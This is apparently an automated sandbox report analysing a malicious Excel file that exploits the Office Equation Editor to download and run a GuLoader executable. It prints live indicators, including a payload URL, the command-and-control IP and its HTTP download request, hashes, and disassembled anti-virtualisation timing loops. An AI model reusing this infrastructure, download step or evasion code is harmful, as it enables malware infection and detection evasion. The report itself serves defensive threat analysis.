Windows Analysis Report MTIR21487610_0062180102_20210714081247.PDF.xlsx

Overview

General Information

Sample Name: MTIR21487610_0062180102_20210714081247.PDF.xlsx
Analysis ID: 449166
MD5: 168c2cabea51b16aa19a152a652254f5
SHA1: 477715c6a9d3219ea85a60eac9c80af83a102357
SHA256: 9b88ac825c56b50955cbc6211bb563f7334c51c2e90e3d2bfebefed817b4ad90
Tags: VelvetSweatshop, xlsx

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected GuLoader
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Drops PE files to the user root directory
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

Found malware configuration
Source: 00000006.00000002.2360248104.00000000003E0000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "http://ceattire.com/bin_UYDMbHwI28.bin"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe Virustotal: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe ReversingLabs: Detection: 31%
Source: C:\Users\Public\vbc.exe Virustotal: Detection: 42%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 31%
Multi AV Scanner detection for submitted file
Source: MTIR21487610_0062180102_20210714081247.PDF.xlsx ReversingLabs: Detection: 28%

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ANTISOCIA.pdb source: .svchost[1].exe.4.dr

Software Vulnerabilities:

Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 180.214.239.39:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 180.214.239.39:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 71MB

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://ceattire.com/bin_UYDMbHwI28.bin
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Thu, 15 Jul 2021 09:06:43 GMT Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28 Last-Modified: Tue, 13 Jul 2021 17:05:39 GMT ETag: "41470-5c7043f493d18" Accept-Ranges: bytes Content-Length: 267376 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: (PE file, MZ header; raw hex dump omitted)
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /cpu/.svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.239.39Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\300F3110.emf
Source: global traffic HTTP traffic detected: GET /cpu/.svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.239.39Connection: Keep-Alive
Source: .svchost[1].exe.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: .svchost[1].exe.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: .svchost[1].exe.4.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: .svchost[1].exe.4.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: .svchost[1].exe.4.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: .svchost[1].exe.4.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: .svchost[1].exe.4.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: .svchost[1].exe.4.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: 300F3110.emf.0.dr String found in binary or memory: http://www.day.com/dam/1.0
Source: .svchost[1].exe.4.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: .svchost[1].exe.4.dr String found in binary or memory: https://www.digicert.com/CPS0

System Summary:

Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe
Abnormal high CPU Usage
Source: C:\Users\Public\vbc.exe Process Stats: CPU usage > 98%
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E54E7 NtAllocateVirtualMemory, 6_2_003E54E7
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E55AC NtAllocateVirtualMemory, 6_2_003E55AC
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E54E7 6_2_003E54E7
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E7036 6_2_003E7036
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E100E 6_2_003E100E
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E4071 6_2_003E4071
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E80D4 6_2_003E80D4
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E2958 6_2_003E2958
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E2940 6_2_003E2940
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E29B0 6_2_003E29B0
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E2183 6_2_003E2183
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E42CD 6_2_003E42CD
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E72C3 6_2_003E72C3
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E1B2D 6_2_003E1B2D
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E1B1A 6_2_003E1B1A
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E7B73 6_2_003E7B73
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E1B5F 6_2_003E1B5F
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E4B8E 6_2_003E4B8E
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E8385 6_2_003E8385
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E43F1 6_2_003E43F1
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E341B 6_2_003E341B
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E844C 6_2_003E844C
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E8C82 6_2_003E8C82
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E8CD5 6_2_003E8CD5
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E34C4 6_2_003E34C4
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E350F 6_2_003E350F
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E8D58 6_2_003E8D58
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E7D52 6_2_003E7D52
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E0EFE 6_2_003E0EFE
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E3F0C 6_2_003E3F0C
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E7F03 6_2_003E7F03
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E7F6D 6_2_003E7F6D
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E0FB5 6_2_003E0FB5
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E2793 6_2_003E2793
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E4785 6_2_003E4785
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: MTIR21487610_0062180102_20210714081247.PDF.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe FF1B034C7060724133C6DF0AA8CF5411EC0E6775D3ACA83A127617340A8C588A
Source: Joe Sandbox View Dropped File: C:\Users\Public\vbc.exe FF1B034C7060724133C6DF0AA8CF5411EC0E6775D3ACA83A127617340A8C588A
PE file contains strange resources
Source: .svchost[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@4/11@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$MTIR21487610_0062180102_20210714081247.PDF.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE205.tmp
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: MTIR21487610_0062180102_20210714081247.PDF.xlsx ReversingLabs: Detection: 28%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: MTIR21487610_0062180102_20210714081247.PDF.xlsx Static file information: File size 1268792 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ANTISOCIA.pdb source: .svchost[1].exe.4.dr
Source: MTIR21487610_0062180102_20210714081247.PDF.xlsx Initial sample: OLE indicators vbamacros = False
Source: MTIR21487610_0062180102_20210714081247.PDF.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: 00000006.00000002.2360248104.00000000003E0000.00000040.00000001.sdmp, type: MEMORY
Yara detected GuLoader
Source: Yara match File source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000000.2144558034.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2360258562.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\Public\vbc.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe, type: DROPPED
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 6_2_0040495E push es; ret 6_2_00404963
Source: C:\Users\Public\vbc.exe Code function: 6_2_00221774 push edx; ret 6_2_002217A1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00221023 push edx; ret 6_2_00221051
Source: C:\Users\Public\vbc.exe Code function: 6_2_00222823 push edx; ret 6_2_00222851
Source: C:\Users\Public\vbc.exe Code function: 6_2_00224023 push edx; ret 6_2_00224051
Source: C:\Users\Public\vbc.exe Code function: 6_2_00227024 push edx; ret 6_2_00227051
Source: C:\Users\Public\vbc.exe Code function: 6_2_00225825 push edx; ret 6_2_00225851
Source: C:\Users\Public\vbc.exe Code function: 6_2_00224833 push edx; ret 6_2_00224861
Source: C:\Users\Public\vbc.exe Code function: 6_2_00223033 push edx; ret 6_2_00223061
Source: C:\Users\Public\vbc.exe Code function: 6_2_00221833 push edx; ret 6_2_00221861
Source: C:\Users\Public\vbc.exe Code function: 6_2_00226034 push edx; ret 6_2_00226061
Source: C:\Users\Public\vbc.exe Code function: 6_2_00220038 push edx; ret 6_2_00220061
Source: C:\Users\Public\vbc.exe Code function: 6_2_00224803 push edx; ret 6_2_00224831
Source: C:\Users\Public\vbc.exe Code function: 6_2_00223003 push edx; ret 6_2_00223031
Source: C:\Users\Public\vbc.exe Code function: 6_2_00221803 push edx; ret 6_2_00221831
Source: C:\Users\Public\vbc.exe Code function: 6_2_00226004 push edx; ret 6_2_00226031
Source: C:\Users\Public\vbc.exe Code function: 6_2_00220008 push edx; ret 6_2_00220031
Source: C:\Users\Public\vbc.exe Code function: 6_2_00223813 push edx; ret 6_2_00223841
Source: C:\Users\Public\vbc.exe Code function: 6_2_00225013 push edx; ret 6_2_00225041
Source: C:\Users\Public\vbc.exe Code function: 6_2_00222014 push edx; ret 6_2_00222041
Source: C:\Users\Public\vbc.exe Code function: 6_2_00226814 push edx; ret 6_2_00226841
Source: C:\Users\Public\vbc.exe Code function: 6_2_00220818 push edx; ret 6_2_00220841
Source: C:\Users\Public\vbc.exe Code function: 6_2_00223063 push edx; ret 6_2_00223091
Source: C:\Users\Public\vbc.exe Code function: 6_2_00221863 push edx; ret 6_2_00221891
Source: C:\Users\Public\vbc.exe Code function: 6_2_00224863 push edx; ret 6_2_00224891
Source: C:\Users\Public\vbc.exe Code function: 6_2_00226065 push edx; ret 6_2_00226091
Source: C:\Users\Public\vbc.exe Code function: 6_2_00220068 push edx; ret 6_2_00220091
Source: C:\Users\Public\vbc.exe Code function: 6_2_00222074 push edx; ret 6_2_002220A1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00223874 push edx; ret 6_2_002238A1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00225074 push edx; ret 6_2_002250A1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00226875 push edx; ret 6_2_002268A1

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: MTIR21487610_0062180102_20210714081247.PDF.xlsx Stream path 'EncryptedPackage' entropy: 7.99875082678 (max. 8.0)

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E7036 6_2_003E7036
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E100E 6_2_003E100E
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E4071 6_2_003E4071
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E2958 6_2_003E2958
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E42CD 6_2_003E42CD
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E1B1A 6_2_003E1B1A
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E1B5F 6_2_003E1B5F
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E43F1 6_2_003E43F1
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E341B 6_2_003E341B
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E7D52 6_2_003E7D52
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E0EFE 6_2_003E0EFE
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E0FB5 6_2_003E0FB5
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E6F9E 6_2_003E6F9E
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E2793 6_2_003E2793
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003E01BE second address: 00000000003E01BE instructions:
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003E70C1 second address: 00000000003E70D5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a add edx, ecx 0x0000000c neg ecx 0x0000000e pushad 0x0000000f mov edx, 000000D8h 0x00000014 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003E8DB2 second address: 00000000003E8DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, edi 0x0000000c test dl, dl 0x0000000e add eax, 00003004h 0x00000013 mov dword ptr [edi+00003000h], eax 0x00000019 test eax, eax 0x0000001b mov ecx, 07CEBD8Ah 0x00000020 cmp ax, 0000BB7Bh 0x00000024 sub ecx, 04255BC2h 0x0000002a xor ecx, 17A2670Fh 0x00000030 cmp al, bl 0x00000032 sub ecx, 140B05FBh 0x00000038 test eax, ebx 0x0000003a test edx, ebx 0x0000003c mov byte ptr [eax+ecx], 00000000h 0x00000040 dec ecx 0x00000041 mov dword ptr [ebp+0000025Ch], edi 0x00000047 mov edi, 4BBAF831h 0x0000004c pushad 0x0000004d rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003E8DFF second address: 00000000003E8DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a test dl, dl 0x0000000c xor edi, 940AC00Fh 0x00000012 test eax, eax 0x00000014 xor edi, A987D7D4h 0x0000001a cmp ax, 0000BFCEh 0x0000001e sub edi, 7637EFEAh 0x00000024 cmp al, bl 0x00000026 cmp ecx, edi 0x00000028 mov edi, dword ptr [ebp+0000025Ch] 0x0000002e jnl 00007F50BC89D70Fh 0x00000030 test edx, ebx 0x00000032 mov byte ptr [eax+ecx], 00000000h 0x00000036 dec ecx 0x00000037 mov dword ptr [ebp+0000025Ch], edi 0x0000003d mov edi, 4BBAF831h 0x00000042 pushad 0x00000043 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003E7A0D second address: 00000000003E7A0D instructions:
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003E01BE second address: 00000000003E01BE instructions:
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003E70C1 second address: 00000000003E70D5 instructions:
  0x00000000 rdtsc
  0x00000002 mov eax, 00000001h
  0x00000007 cpuid
  0x00000009 popad
  0x0000000a add edx, ecx
  0x0000000c neg ecx
  0x0000000e pushad
  0x0000000f mov edx, 000000D8h
  0x00000014 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003E8DB2 second address: 00000000003E8DFF instructions:
  0x00000000 rdtsc
  0x00000002 mov eax, 00000001h
  0x00000007 cpuid
  0x00000009 popad
  0x0000000a mov eax, edi
  0x0000000c test dl, dl
  0x0000000e add eax, 00003004h
  0x00000013 mov dword ptr [edi+00003000h], eax
  0x00000019 test eax, eax
  0x0000001b mov ecx, 07CEBD8Ah
  0x00000020 cmp ax, 0000BB7Bh
  0x00000024 sub ecx, 04255BC2h
  0x0000002a xor ecx, 17A2670Fh
  0x00000030 cmp al, bl
  0x00000032 sub ecx, 140B05FBh
  0x00000038 test eax, ebx
  0x0000003a test edx, ebx
  0x0000003c mov byte ptr [eax+ecx], 00000000h
  0x00000040 dec ecx
  0x00000041 mov dword ptr [ebp+0000025Ch], edi
  0x00000047 mov edi, 4BBAF831h
  0x0000004c pushad
  0x0000004d rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003E8DFF second address: 00000000003E8DFF instructions:
  0x00000000 rdtsc
  0x00000002 mov eax, 00000001h
  0x00000007 cpuid
  0x00000009 popad
  0x0000000a test dl, dl
  0x0000000c xor edi, 940AC00Fh
  0x00000012 test eax, eax
  0x00000014 xor edi, A987D7D4h
  0x0000001a cmp ax, 0000BFCEh
  0x0000001e sub edi, 7637EFEAh
  0x00000024 cmp al, bl
  0x00000026 cmp ecx, edi
  0x00000028 mov edi, dword ptr [ebp+0000025Ch]
  0x0000002e jnl 00007F50BC89D70Fh
  0x00000030 test edx, ebx
  0x00000032 mov byte ptr [eax+ecx], 00000000h
  0x00000036 dec ecx
  0x00000037 mov dword ptr [ebp+0000025Ch], edi
  0x0000003d mov edi, 4BBAF831h
  0x00000042 pushad
  0x00000043 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003E7A0D second address: 00000000003E7A0D instructions:
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E54E7 rdtsc 6_2_003E54E7
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 740 Thread sleep time: -240000s >= -30000s
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 740 Thread sleep time: -60000s >= -30000s

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E54E7 rdtsc 6_2_003E54E7
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E50CA mov eax, dword ptr fs:[00000030h] 6_2_003E50CA
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E2958 mov eax, dword ptr fs:[00000030h] 6_2_003E2958
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E71A9 mov eax, dword ptr fs:[00000030h] 6_2_003E71A9
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E6B93 mov eax, dword ptr fs:[00000030h] 6_2_003E6B93
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E341B mov eax, dword ptr fs:[00000030h] 6_2_003E341B
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E7D52 mov eax, dword ptr fs:[00000030h] 6_2_003E7D52

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: vbc.exe, 00000006.00000002.2360338564.0000000000A50000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: vbc.exe, 00000006.00000002.2360338564.0000000000A50000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.2360338564.0000000000A50000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Users\Public\vbc.exe Code function: 6_2_003E2183 cpuid 6_2_003E2183
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
[Chart legend (IP count buckets): No. of IPs < 25%; 25% < No. of IPs < 50%; 50% < No. of IPs < 75%; 75% < No. of IPs]